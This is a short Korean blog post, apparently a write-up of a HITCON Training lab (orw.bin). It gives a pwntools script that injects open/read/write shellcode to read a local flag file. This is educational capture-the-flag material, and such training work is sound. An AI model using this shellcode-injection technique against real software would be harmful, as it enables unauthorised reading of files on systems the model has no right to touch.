lab2 디렉토리로 가보니 orw.bin 이라는 바이너리가 있어 이를 ida로 열어보았다.
그냥 대놓고 쉘코드 넣으세용 하고 있어서 pwntools의 shellcraft를 사용했다. flag.txt 파일이 없어서 그냥 임의로 만들어서 익스를 했다 ㅎㅎ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
from pwn import *
s = process("orw.bin")
pay = ""
pay += asm(shellcraft.open("./flag.txt"))
pay += asm(shellcraft.read("eax","esp",100))
pay += asm(shellcraft.write(1,"esp",100))
s.recvuntil("shellcode:")
s.sendline(pay)
s.interactive()
|
cs |
뚝딱!
[HITCON_Training] LAB 6 (0) | 2019.07.07 |
---|---|
[HITCON_Training] LAB 5 (0) | 2019.07.07 |
[HITCON_Training] lab 4 (0) | 2019.07.05 |
[HITCON Training] LAB 3 (0) | 2019.07.04 |
[HITCON Training] LAB 1 (0) | 2019.07.03 |